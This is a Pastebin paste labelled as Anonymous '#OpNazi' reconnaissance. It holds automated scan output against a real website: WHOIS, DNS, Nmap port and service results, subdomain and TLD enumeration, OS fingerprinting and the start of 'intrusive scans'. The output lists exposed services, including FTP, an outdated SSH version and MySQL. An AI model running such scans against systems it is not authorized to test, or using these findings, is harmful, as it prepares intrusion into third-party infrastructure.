Advertisement
Guest User

JTSEC full recon Anonymous #Opnazi #1

a guest
Sep 28th, 2017
388
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 101.80 KB | None | 0 0
  1. ##############################################################################################################################################################################################################################################################################
  2. JTSEC full recon Anonymous #opnazi #1
  3.  
  4.  
  5.  
  6.  
  7. [i] Scanning Site: http://americannaziparty.com
  8.  
  9.  
  10.  
  11. B A S I C I N F O
  12. ====================
  13.  
  14.  
  15. [+] Site Title:
  16. [+] IP address: 66.33.207.59
  17. [+] Web Server: Could Not Detect
  18. [+] CMS: Could Not Detect
  19. [+] Cloudflare: Detected
  20. [+] Robots File: Could NOT Find robots.txt!
  21.  
  22.  
  23.  
  24.  
  25. W H O I S L O O K U P
  26. ========================
  27.  
  28. Domain Name: AMERICANNAZIPARTY.COM
  29. Registry Domain ID: 9550948_DOMAIN_COM-VRSN
  30. Registrar WHOIS Server: whois.dreamhost.com
  31. Registrar URL: http://www.DreamHost.com
  32. Updated Date: 2017-08-08T02:24:55Z
  33. Creation Date: 1999-08-27T20:59:21Z
  34. Registry Expiry Date: 2018-08-27T20:59:18Z
  35. Registrar: DreamHost, LLC
  36. Registrar IANA ID: 431
  37. Registrar Abuse Contact Email:
  38. Registrar Abuse Contact Phone:
  39. Domain Status: ok https://icann.org/epp#ok
  40. Name Server: NS1.DREAMHOST.COM
  41. Name Server: NS2.DREAMHOST.COM
  42. Name Server: NS3.DREAMHOST.COM
  43. DNSSEC: unsigned
  44. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  45. >>> Last update of whois database: 2017-09-28T06:35:28Z <<<
  46.  
  47. For more information on Whois status codes, please visit https://icann.org/epp
  48.  
  49.  
  50.  
  51. The Registry database contains ONLY .COM, .NET, .EDU domains and
  52. Registrars.
  53.  
  54.  
  55.  
  56.  
  57. G E O I P L O O K U P
  58. =========================
  59.  
  60. [i] IP Address: 66.33.207.59
  61. [i] Country: US
  62. [i] State: California
  63. [i] City: Brea
  64. [i] Latitude: 33.926899
  65. [i] Longitude: -117.861198
  66.  
  67.  
  68.  
  69.  
  70. H T T P H E A D E R S
  71. =======================
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78. D N S L O O K U P
  79. ===================
  80.  
  81. americannaziparty.com. 14206 IN A 66.33.207.59
  82. americannaziparty.com. 14399 IN NS ns1.dreamhost.com.
  83. americannaziparty.com. 14399 IN NS ns2.dreamhost.com.
  84. americannaziparty.com. 14399 IN NS ns3.dreamhost.com.
  85. americannaziparty.com. 14399 IN SOA ns1.dreamhost.com. hostmaster.dreamhost.com. 2017061500 19112 1800 1814400 14400
  86. americannaziparty.com. 14399 IN MX 0 vade-in1.mail.dreamhost.com.
  87. americannaziparty.com. 14399 IN MX 0 vade-in2.mail.dreamhost.com.
  88.  
  89.  
  90.  
  91.  
  92. S U B N E T C A L C U L A T I O N
  93. ====================================
  94.  
  95. Address = 66.33.207.59
  96. Network = 66.33.207.59 / 32
  97. Netmask = 255.255.255.255
  98. Broadcast = not needed on Point-to-Point links
  99. Wildcard Mask = 0.0.0.0
  100. Hosts Bits = 0
  101. Max. Hosts = 1 (2^0 - 0)
  102. Host Range = { 66.33.207.59 - 66.33.207.59 }
  103.  
  104.  
  105.  
  106. N M A P P O R T S C A N
  107. ============================
  108.  
  109.  
  110. Starting Nmap 7.01 ( https://nmap.org ) at 2017-09-28 06:36 UTC
  111. Nmap scan report for americannaziparty.com (66.33.207.59)
  112. Host is up (0.074s latency).
  113. rDNS record for 66.33.207.59: ds8317.dreamservers.com
  114. PORT STATE SERVICE VERSION
  115. 21/tcp open ftp ProFTPD
  116. 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.9 (Ubuntu Linux; protocol 2.0)
  117. 23/tcp filtered telnet
  118. 25/tcp open smtp Postfix smtpd
  119. 80/tcp open http Apache httpd
  120. 110/tcp filtered pop3
  121. 143/tcp filtered imap
  122. 443/tcp filtered https
  123. 445/tcp filtered microsoft-ds
  124. 3389/tcp filtered ms-wbt-server
  125. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  126.  
  127. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  128. Nmap done: 1 IP address (1 host up) scanned in 16.25 seconds
  129.  
  130.  
  131.  
  132. S U B - D O M A I N F I N D E R
  133. ==================================
  134.  
  135.  
  136. [i] Total Subdomains Found : 1
  137.  
  138. [+] Subdomain: americannaziparty.com
  139. [-] IP: 66.33.207.59
  140.  
  141.  
  142. NetRange: 66.33.192.0 - 66.33.223.255
  143. CIDR: 66.33.192.0/19
  144. NetName: DREAMHOST-BLK1
  145. NetHandle: NET-66-33-192-0-1
  146. Parent: NET66 (NET-66-0-0-0-0)
  147. NetType: Direct Allocation
  148. OriginAS:
  149. Organization: New Dream Network, LLC (NDN)
  150. RegDate: 2002-04-26
  151. Updated: 2015-08-31
  152. Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
  153. Comment: ** For abuse issues, please contact abuse@dreamhost.com **
  154. Ref: https://whois.arin.net/rest/net/NET-66-33-192-0-1
  155.  
  156.  
  157. OrgName: New Dream Network, LLC
  158. OrgId: NDN
  159. Address: 417 Associated Rd.
  160. Address: PMB #257
  161. City: Brea
  162. StateProv: CA
  163. PostalCode: 92821
  164. Country: US
  165. RegDate: 2001-04-16
  166. Updated: 2017-01-28
  167. Comment: Address location was created regardless of geographic location.
  168. Ref: https://whois.arin.net/rest/org/NDN
  169.  
  170.  
  171. OrgTechHandle: NETOP274-ARIN
  172. OrgTechName: NetOPs
  173. OrgTechPhone: +1-714-706-4182
  174. OrgTechEmail: netops@dreamhost.com
  175. OrgTechRef: https://whois.arin.net/rest/poc/NETOP274-ARIN
  176.  
  177. OrgAbuseHandle: DAT5-ARIN
  178. OrgAbuseName: DreamHost Abuse Team
  179. OrgAbusePhone: +1-714-706-4182
  180. OrgAbuseEmail: abuse@dreamhost.com
  181. OrgAbuseRef: https://whois.arin.net/rest/poc/DAT5-ARIN
  182.  
  183. OrgNOCHandle: NETOP274-ARIN
  184. OrgNOCName: NetOPs
  185. OrgNOCPhone: +1-714-706-4182
  186. OrgNOCEmail: netops@dreamhost.com
  187. OrgNOCRef: https://whois.arin.net/rest/poc/NETOP274-ARIN
  188. [*] Performing TLD Brute force Enumeration against americannaziparty.com
  189. [*] The operation could take up to: 00:01:07
  190. [*] A americannaziparty.biz.af 5.45.75.45
  191. [*] A americannaziparty.co.asia 91.195.240.135
  192. [*] CNAME americannaziparty.biz.at free.biz.at
  193. [*] A free.biz.at 216.92.134.29
  194. [*] A americannaziparty.org.aw 142.4.20.12
  195. [*] A americannaziparty.co.ba 176.9.45.78
  196. [*] A americannaziparty.com.ba 195.222.33.180
  197. [*] A americannaziparty.com.be 95.173.170.166
  198. [*] A americannaziparty.biz.by 71.18.52.2
  199. [*] A americannaziparty.biz.bz 199.59.242.150
  200. [*] A americannaziparty.com.cc 54.252.107.64
  201. [*] A americannaziparty.net.cc 54.252.89.206
  202. [*] A americannaziparty.co.cc 175.126.123.219
  203. [*] A americannaziparty.org.ch 72.52.4.122
  204. [*] A americannaziparty.co.cm 85.25.140.105
  205. [*] A americannaziparty.biz.cl 185.53.178.8
  206. [*] A americannaziparty.net.cm 85.25.140.105
  207. [*] A americannaziparty.com 66.33.207.59
  208. [*] A americannaziparty.net.com 199.59.242.150
  209. [*] A americannaziparty.com.com 52.33.196.199
  210. [*] A americannaziparty.org.com 23.23.86.44
  211. [*] A americannaziparty.co.com 173.192.115.17
  212. [*] A americannaziparty.biz.cr 72.52.4.122
  213. [*] CNAME americannaziparty.biz.cm i.cns.cm
  214. [*] A i.cns.cm 118.184.56.30
  215. [*] A americannaziparty.net.cz 80.250.24.177
  216. [*] A americannaziparty.biz.cx 72.52.4.122
  217. [*] A americannaziparty.com.cz 62.109.128.30
  218. [*] A americannaziparty.biz.cz 185.53.179.7
  219. [*] A americannaziparty.com.de 50.56.68.37
  220. [*] CNAME americannaziparty.org.de www.org.de
  221. [*] A www.org.de 78.47.128.8
  222. [*] CNAME americannaziparty.co.de co.de
  223. [*] A co.de 144.76.162.245
  224. [*] A americannaziparty.net.eu 78.46.90.98
  225. [*] A americannaziparty.org.eu 78.46.90.98
  226. [*] A americannaziparty.biz.fi 185.55.85.123
  227. [*] A americannaziparty.fm 173.230.131.38
  228. [*] CNAME americannaziparty.com.fi dnspod-vip3.mydnspod.net
  229. [*] A dnspod-vip3.mydnspod.net 119.28.48.218
  230. [*] A dnspod-vip3.mydnspod.net 119.28.48.237
  231. [*] A americannaziparty.biz.fm 173.230.131.38
  232. [*] A americannaziparty.org.fr 149.202.133.35
  233. [*] A americannaziparty.biz.gl 72.52.4.122
  234. [*] CNAME americannaziparty.co.gp co.gp
  235. [*] A co.gp 144.76.162.245
  236. [*] A americannaziparty.co.hn 208.100.40.203
  237. [*] CNAME americannaziparty.net.hr net.hr
  238. [*] A net.hr 192.0.78.25
  239. [*] A net.hr 192.0.78.24
  240. [*] A americannaziparty.co.ht 72.52.4.122
  241. [*] CNAME americannaziparty.biz.hn parkmydomain.vhostgo.com
  242. [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
  243. [*] A westuser.dopa.com 107.186.245.119
  244. [*] A americannaziparty.co.jobs 50.17.193.222
  245. [*] A americannaziparty.com.jobs 50.19.241.165
  246. [*] A americannaziparty.net.jobs 50.19.241.165
  247. [*] A americannaziparty.biz.jobs 50.19.241.165
  248. [*] A americannaziparty.org.jobs 50.19.241.165
  249. [*] A americannaziparty.biz.ky 199.184.144.27
  250. [*] A americannaziparty.la 173.230.141.80
  251. [*] CNAME americannaziparty.biz.li 712936.parkingcrew.net
  252. [*] A 712936.parkingcrew.net 185.53.179.29
  253. [*] A americannaziparty.biz.lu 195.26.5.2
  254. [*] A americannaziparty.biz.ly 64.136.20.39
  255. [*] A americannaziparty.biz.md 72.52.4.122
  256. [*] A americannaziparty.co.mk 87.76.31.211
  257. [*] A americannaziparty.co.mobi 54.225.105.179
  258. [*] A americannaziparty.biz.my 202.190.174.44
  259. [*] A americannaziparty.co.net 188.166.216.219
  260. [*] A americannaziparty.net.net 52.50.81.210
  261. [*] A americannaziparty.org.net 23.23.86.44
  262. [*] A americannaziparty.co.nl 37.97.184.204
  263. [*] A americannaziparty.com.nl 83.98.157.102
  264. [*] A americannaziparty.net.nl 83.98.157.102
  265. [*] A americannaziparty.co.nr 208.100.40.202
  266. [*] A americannaziparty.org.nu 80.92.84.139
  267. [*] A americannaziparty.net.nu 199.102.76.78
  268. [*] CNAME americannaziparty.co.nu co.nu
  269. [*] A co.nu 144.76.162.245
  270. [*] CNAME americannaziparty.com.nu com.nu
  271. [*] A com.nu 144.76.162.245
  272. [*] A americannaziparty.com.org 23.23.86.44
  273. [*] A americannaziparty.org 69.13.95.17
  274. [*] CNAME americannaziparty.net.org pewtrusts.org
  275. [*] A pewtrusts.org 204.74.99.100
  276. [*] A americannaziparty.com.ph 45.79.222.138
  277. [*] A americannaziparty.ph 45.79.222.138
  278. [*] A americannaziparty.net.ph 45.79.222.138
  279. [*] A americannaziparty.co.ph 45.79.222.138
  280. [*] A americannaziparty.org.ph 45.79.222.138
  281. [*] A americannaziparty.co.pl 212.91.6.55
  282. [*] A americannaziparty.org.pm 208.73.210.202
  283. [*] A americannaziparty.org.pm 208.73.211.177
  284. [*] A americannaziparty.org.pm 208.73.210.217
  285. [*] A americannaziparty.org.pm 208.73.211.165
  286. [*] CNAME americannaziparty.biz.ps biz.ps
  287. [*] A biz.ps 144.76.162.245
  288. [*] A americannaziparty.co.pt 194.107.127.52
  289. [*] A americannaziparty.pw 141.8.226.58
  290. [*] A americannaziparty.net.pw 141.8.226.59
  291. [*] A americannaziparty.co.pw 141.8.226.59
  292. [*] A americannaziparty.biz.pw 141.8.226.59
  293. [*] A americannaziparty.co.ps 66.96.132.56
  294. [*] A americannaziparty.org.pw 141.8.226.59
  295. [*] A americannaziparty.net.ro 69.64.52.127
  296. [*] A americannaziparty.org.re 217.70.184.38
  297. [*] CNAME americannaziparty.co.ro now.co.ro
  298. [*] A now.co.ro 185.27.255.9
  299. [*] A americannaziparty.com.ru 178.210.89.119
  300. [*] A americannaziparty.biz.se 185.53.179.6
  301. [*] CNAME americannaziparty.net.se 773147.parkingcrew.net
  302. [*] A 773147.parkingcrew.net 185.53.179.29
  303. [*] A americannaziparty.co.sl 91.195.240.135
  304. [*] A americannaziparty.com.sr 143.95.106.249
  305. [*] A americannaziparty.biz.st 91.121.28.115
  306. [*] A americannaziparty.co.su 72.52.4.122
  307. [*] A americannaziparty.biz.tc 64.136.20.39
  308. [*] A americannaziparty.biz.tf 85.236.153.18
  309. [*] A americannaziparty.net.tf 188.40.70.27
  310. [*] A americannaziparty.net.tf 188.40.70.29
  311. [*] A americannaziparty.net.tf 188.40.117.12
  312. [*] A americannaziparty.co.tl 208.100.40.202
  313. [*] A americannaziparty.co.to 175.118.124.44
  314. [*] A americannaziparty.co.tv 31.186.25.163
  315. [*] A americannaziparty.biz.tv 72.52.4.122
  316. [*] A americannaziparty.org.tv 72.52.4.122
  317. [*] CNAME americannaziparty.biz.uz biz.uz
  318. [*] A biz.uz 144.76.162.245
  319. [*] A americannaziparty.vg 88.198.29.97
  320. [*] A americannaziparty.co.vg 88.198.29.97
  321. [*] A americannaziparty.com.vg 88.198.29.97
  322. [*] A americannaziparty.net.vg 68.178.254.180
  323. [*] A americannaziparty.biz.vg 89.31.143.20
  324. [*] A americannaziparty.ws 64.70.19.203
  325. [*] A americannaziparty.biz.ws 184.168.221.104
  326. [*] A americannaziparty.com.ws 202.4.48.211
  327. [*] A americannaziparty.net.ws 202.4.48.211
  328. [*] A americannaziparty.org.ws 202.4.48.211
  329. + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  330. Server: 192.168.1.254
  331. Address: 192.168.1.254#53
  332.  
  333. Non-authoritative answer:
  334. Name: americannaziparty.com
  335. Address: 66.33.207.59
  336.  
  337. americannaziparty.com has address 66.33.207.59
  338. americannaziparty.com mail is handled by 0 vade-in2.mail.dreamhost.com.
  339. americannaziparty.com mail is handled by 0 vade-in1.mail.dreamhost.com.
  340. + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  341. [-] fingerprint:snmp: need UDP port 161 open
  342.  
  343. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  344.  
  345. [+] Target is americannaziparty.com
  346. [+] Loading modules.
  347. [+] Following modules are loaded:
  348. [x] [1] ping:icmp_ping - ICMP echo discovery module
  349. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  350. [x] [3] ping:udp_ping - UDP-based ping discovery module
  351. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  352. [x] [5] infogather:portscan - TCP and UDP PortScanner
  353. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  354. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  355. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  356. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  357. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  358. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  359. [x] [12] fingerprint:smb - SMB fingerprinting module
  360. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  361. [+] 13 modules registered
  362. [+] Initializing scan engine
  363. [+] Running scan engine
  364. [-] ping:tcp_ping module: no closed/open TCP ports known on 66.33.207.59. Module test failed
  365. [-] ping:udp_ping module: no closed/open UDP ports known on 66.33.207.59. Module test failed
  366. [-] No distance calculation. 66.33.207.59 appears to be dead or no ports known
  367. [+] Host: 66.33.207.59 is up (Guess probability: 50%)
  368. [+] Target: 66.33.207.59 is alive. Round-Trip Time: 0.48766 sec
  369. [+] Selected safe Round-Trip Time value is: 0.97532 sec
  370. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  371. [-] fingerprint:smb need either TCP port 139 or 445 to run
  372. [+] Primary guess:
  373. [+] Host 66.33.207.59 Running OS: "FreeBSD 4.9" (Guess probability: 100%)
  374. [+] Other guesses:
  375. [+] Host 66.33.207.59 Running OS: (Guess probability: 100%)
  376. [+] Host 66.33.207.59 Running OS: (Guess probability: 100%)
  377. [+] Host 66.33.207.59 Running OS: (Guess probability: 100%)
  378. [+] Host 66.33.207.59 Running OS: (Guess probability: 100%)
  379. [+] Host 66.33.207.59 Running OS: (Guess probability: 100%)
  380. [+] Host 66.33.207.59 Running OS: (Guess probability: 100%)
  381. [+] Host 66.33.207.59 Running OS: "FreeBSD 5.4" (Guess probability: 100%)
  382. [+] Host 66.33.207.59 Running OS: "FreeBSD 5.3" (Guess probability: 100%)
  383. [+] Host 66.33.207.59 Running OS: "FreeBSD 5.2.1" (Guess probability: 100%)
  384. [+] Cleaning up scan engine
  385. [+] Modules deinitialized
  386. [+] Execution completed.
  387. + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  388. Domain Name: AMERICANNAZIPARTY.COM
  389. Registry Domain ID: 9550948_DOMAIN_COM-VRSN
  390. Registrar WHOIS Server: whois.dreamhost.com
  391. Registrar URL: http://www.DreamHost.com
  392. Updated Date: 2017-08-08T02:24:55Z
  393. Creation Date: 1999-08-27T20:59:21Z
  394. Registry Expiry Date: 2018-08-27T20:59:18Z
  395. Registrar: DreamHost, LLC
  396. Registrar IANA ID: 431
  397. Registrar Abuse Contact Email:
  398. Registrar Abuse Contact Phone:
  399. Domain Status: ok https://icann.org/epp#ok
  400. Name Server: NS1.DREAMHOST.COM
  401. Name Server: NS2.DREAMHOST.COM
  402. Name Server: NS3.DREAMHOST.COM
  403. DNSSEC: unsigned
  404. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  405. >>> Last update of whois database: 2017-09-28T06:24:24Z <<<
  406.  
  407. For more information on Whois status codes, please visit https://icann.org/epp
  408.  
  409. NOTICE: The expiration date displayed in this record is the date the
  410. registrar's sponsorship of the domain name registration in the registry is
  411. currently set to expire. This date does not necessarily reflect the expiration
  412. date of the domain name registrant's agreement with the sponsoring
  413. registrar. Users may consult the sponsoring registrar's Whois database to
  414. view the registrar's reported date of expiration for this registration.
  415.  
  416. TERMS OF USE: You are not authorized to access or query our Whois
  417. database through the use of electronic processes that are high-volume and
  418. automated except as reasonably necessary to register domain names or
  419. modify existing registrations; the Data in VeriSign Global Registry
  420. Services' ("VeriSign") Whois database is provided by VeriSign for
  421. information purposes only, and to assist persons in obtaining information
  422. about or related to a domain name registration record. VeriSign does not
  423. guarantee its accuracy. By submitting a Whois query, you agree to abide
  424. by the following terms of use: You agree that you may use this Data only
  425. for lawful purposes and that under no circumstances will you use this Data
  426. to: (1) allow, enable, or otherwise support the transmission of mass
  427. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  428. or facsimile; or (2) enable high volume, automated, electronic processes
  429. that apply to VeriSign (or its computer systems). The compilation,
  430. repackaging, dissemination or other use of this Data is expressly
  431. prohibited without the prior written consent of VeriSign. You agree not to
  432. use electronic processes that are automated and high-volume to access or
  433. query the Whois database except as reasonably necessary to register
  434. domain names or modify existing registrations. VeriSign reserves the right
  435. to restrict your access to the Whois database in its sole discretion to ensure
  436. operational stability. VeriSign may restrict or terminate your access to the
  437. Whois database for failure to abide by these terms of use. VeriSign
  438. reserves the right to modify these terms at any time.
  439.  
  440. The Registry database contains ONLY .COM, .NET, .EDU domains and
  441. Registrars.
  442.  
  443.  
  444. Domain Name: AMERICANNAZIPARTY.COM
  445. Registry Domain ID: 9550948_DOMAIN_COM-VRSN
  446. Registrar WHOIS Server: whois.dreamhost.com
  447. Registrar URL: www.dreamhost.com
  448. Updated Date: 2015-07-27T21:05:30.00Z
  449. Creation Date: 1999-08-27T20:59:00.00Z
  450. Registrar Registration Expiration Date: 2018-08-27T20:59:18.00Z
  451. Registrar: DREAMHOST
  452. Registrar IANA ID: 431
  453. Domain Status: ok https://www.icann.org/epp#ok
  454. Registry Registrant ID:
  455. Registrant Name: PROXY PROTECTION LLC
  456. Registrant Organization: PROXY PROTECTION LLC
  457. Registrant Street: 417 ASSOCIATED RD #324
  458. Registrant Street: C/O AMERICANNAZIPARTY.COM
  459. Registrant City: BREA
  460. Registrant State/Province: CA
  461. Registrant Postal Code: 92821
  462. Registrant Country: US
  463. Registrant Phone: +1.7147064182
  464. Registrant Phone Ext:
  465. Registrant Fax:
  466. Registrant Fax Ext:
  467. Registrant Email: 8ZMB8WSMSWWVUQU@PROXY.DREAMHOST.COM
  468. Registry Admin ID:
  469. Admin Name: PROXY PROTECTION LLC
  470. Admin Organization: PROXY PROTECTION LLC
  471. Admin Street: 417 ASSOCIATED RD #324
  472. Admin Street: C/O AMERICANNAZIPARTY.COM
  473. Admin City: BREA
  474. Admin State/Province: CA
  475. Admin Postal Code: 92821
  476. Admin Country: US
  477. Admin Phone: +1.7147064182
  478. Admin Phone Ext:
  479. Admin Fax:
  480. Admin Fax Ext:
  481. Admin Email: GK7JRCFURSLEU2R@PROXY.DREAMHOST.COM
  482. Registry Tech ID:
  483. Tech Name: PROXY PROTECTION LLC
  484. Tech Organization: PROXY PROTECTION LLC
  485. Tech Street: 417 ASSOCIATED RD #324
  486. Tech Street: C/O AMERICANNAZIPARTY.COM
  487. Tech City: BREA
  488. Tech State/Province: CA
  489. Tech Postal Code: 92821
  490. Tech Country: US
  491. Tech Phone: +1.7147064182
  492. Tech Phone Ext:
  493. Tech Fax:
  494. Tech Fax Ext:
  495. Tech Email: GK7JRCFURSLEU2R@PROXY.DREAMHOST.COM
  496. Name Server: NS1.DREAMHOST.COM
  497. Name Server: NS2.DREAMHOST.COM
  498. Name Server: NS3.DREAMHOST.COM
  499. DNSSEC: unSigned
  500. Registrar Abuse Contact Email: domain-abuse@dreamhost.com
  501. Registrar Abuse Contact Phone: +1.2132719359
  502. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
  503. >>> Last update of WHOIS database: 2015-07-27T21:05:30.00Z <<<
  504.  
  505. For more information on Whois status codes, please visit https://icann.org/epp
  506.  
  507. DreamHost whois server terms of service: http://whois.dreamhost.com/
  508.  
  509. DreamHost is a global Web hosting and cloud services provider with over 375,000 customers and 1.2 million blogs, websites and apps hosted. The company offers a wide spectrum of Web hosting and cloud services including Shared Hosting, Virtual Private Servers (VPS), Dedicated Server Hosting, Domain Name Registration, the cloud storage service, DreamObjects, and the cloud computing service DreamCompute. Please visit http://DreamHost.com for more information.
  510. + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  511.  
  512. *******************************************************************
  513. * *
  514. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  515. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  516. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  517. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  518. * *
  519. * TheHarvester Ver. 2.7 *
  520. * Coded by Christian Martorella *
  521. * Edge-Security Research *
  522. * cmartorella@edge-security.com *
  523. *******************************************************************
  524.  
  525.  
  526. [-] Searching in Bing:
  527. Searching 50 results...
  528. Searching 100 results...
  529.  
  530.  
  531. [+] Emails found:
  532. ------------------
  533. No emails found
  534.  
  535. [+] Hosts found in search engines:
  536. ------------------------------------
  537. [-] Resolving hostnames IPs...
  538. 104.27.137.244:www.americannaziparty.com
  539. + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  540.  
  541. ; <<>> DiG 9.10.3-P4-Debian <<>> -x americannaziparty.com
  542. ;; global options: +cmd
  543. ;; Got answer:
  544. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 52160
  545. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  546.  
  547. ;; OPT PSEUDOSECTION:
  548. ; EDNS: version: 0, flags:; udp: 4096
  549. ;; QUESTION SECTION:
  550. ;com.americannaziparty.in-addr.arpa. IN PTR
  551.  
  552. ;; AUTHORITY SECTION:
  553. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043195 1800 900 604800 3600
  554.  
  555. ;; Query time: 37 msec
  556. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  557. ;; WHEN: Thu Sep 28 02:24:58 EDT 2017
  558. ;; MSG SIZE rcvd: 131
  559.  
  560. Smartmatch is experimental at /usr/bin/dnsenum line 698.
  561. Smartmatch is experimental at /usr/bin/dnsenum line 698.
  562. AXFR record query failed: REFUSED
  563. AXFR record query failed: NOTAUTH
  564. AXFR record query failed: NOTAUTH
  565. dnsenum VERSION:1.2.4
  566.  
  567. ----- americannaziparty.com -----
  568.  
  569.  
  570. Host's addresses:
  571. __________________
  572.  
  573. americannaziparty.com. 14376 IN A 66.33.207.59
  574.  
  575.  
  576. Name Servers:
  577. ______________
  578.  
  579. ns2.dreamhost.com. 5131 IN A 208.97.182.10
  580. ns1.dreamhost.com. 14400 IN A 64.90.62.230
  581. ns3.dreamhost.com. 14400 IN A 66.33.205.230
  582.  
  583.  
  584. Mail (MX) Servers:
  585. ___________________
  586.  
  587. vade-in1.mail.dreamhost.com. 14400 IN A 66.33.205.212
  588. vade-in2.mail.dreamhost.com. 14400 IN A 66.33.205.213
  589.  
  590.  
  591. Trying Zone Transfers and getting Bind Versions:
  592. _________________________________________________
  593.  
  594.  
  595. Trying Zone Transfer for americannaziparty.com on ns2.dreamhost.com ...
  596.  
  597. Trying Zone Transfer for americannaziparty.com on ns1.dreamhost.com ...
  598.  
  599. Trying Zone Transfer for americannaziparty.com on ns3.dreamhost.com ...
  600.  
  601. brute force file not specified, bay.
  602. + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  603.  
  604. ____ _ _ _ _ _____
  605. / ___| _ _| |__ | (_)___| |_|___ / _ __
  606. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  607. ___) | |_| | |_) | | \__ \ |_ ___) | |
  608. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  609.  
  610. # Coded By Ahmed Aboul-Ela - @aboul3la
  611.  
  612. [-] Enumerating subdomains now for americannaziparty.com
  613. [-] verbosity is enabled, will show the subdomains results in realtime
  614. [-] Searching now in Baidu..
  615. [-] Searching now in Yahoo..
  616. [-] Searching now in Google..
  617. [-] Searching now in Bing..
  618. [-] Searching now in Ask..
  619. [-] Searching now in Netcraft..
  620. [-] Searching now in DNSdumpster..
  621. [-] Searching now in Virustotal..
  622. [-] Searching now in ThreatCrowd..
  623. [-] Searching now in SSL Certificates..
  624. [-] Searching now in PassiveDNS..
  625. ThreatCrowd: www.americannaziparty.com
  626. Yahoo: www.americannaziparty.com
  627. Yahoo: webmail.americannaziparty.com
  628. Virustotal: webmail.americannaziparty.com
  629. Virustotal: www.americannaziparty.com
  630. Netcraft: www.americannaziparty.com
  631. Bing: webmail.americannaziparty.com
  632. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-americannaziparty.com.txt
  633. [-] Total Unique Subdomains Found: 2
  634. www.americannaziparty.com
  635. webmail.americannaziparty.com
  636.  
  637. ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  638. ║ ╠╦╝ ║ ╚═╗╠═╣
  639. ╚═╝╩╚═ ╩o╚═╝╩ ╩
  640. + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  641.  
  642. *.americannaziparty.com
  643. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-americannaziparty.com-full.txt
  644.  
  645. + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  646. + -- ----------------------------=[Checking Email Security]=----------------- -- +
  647.  
  648. + -- ----------------------------=[Pinging host]=---------------------------- -- +
  649. PING americannaziparty.com (66.33.207.59) 56(84) bytes of data.
  650. 64 bytes from ds8317.dreamservers.com (66.33.207.59): icmp_seq=1 ttl=48 time=259 ms
  651.  
  652. --- americannaziparty.com ping statistics ---
  653. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  654. rtt min/avg/max/mdev = 259.215/259.215/259.215/0.000 ms
  655.  
  656. + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  657.  
  658. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-28 02:25 EDT
  659. Nmap scan report for americannaziparty.com (66.33.207.59)
  660. Host is up (0.60s latency).
  661. rDNS record for 66.33.207.59: ds8317.dreamservers.com
  662. Not shown: 469 filtered ports
  663. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  664. PORT STATE SERVICE
  665. 21/tcp open ftp
  666. 22/tcp open ssh
  667. 80/tcp open http
  668. 3306/tcp open mysql
  669.  
  670. Nmap done: 1 IP address (1 host up) scanned in 77.37 seconds
  671.  
  672. + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  673. + -- --=[Port 21 opened... running tests...
  674.  
  675. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-28 02:26 EDT
  676. Nmap scan report for americannaziparty.com (66.33.207.59)
  677. Host is up (0.26s latency).
  678. rDNS record for 66.33.207.59: ds8317.dreamservers.com
  679. Skipping host americannaziparty.com (66.33.207.59) due to host timeout
  680. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  681. Nmap done: 1 IP address (1 host up) scanned in 909.59 seconds
  682.  
  683.  
  684. ______________________________________________________________________________
  685. | |
  686. | 3Kom SuperHack II Logon |
  687. |______________________________________________________________________________|
  688. | |
  689. | |
  690. | |
  691. | User Name: [ security ] |
  692. | |
  693. | Password: [ ] |
  694. | |
  695. | |
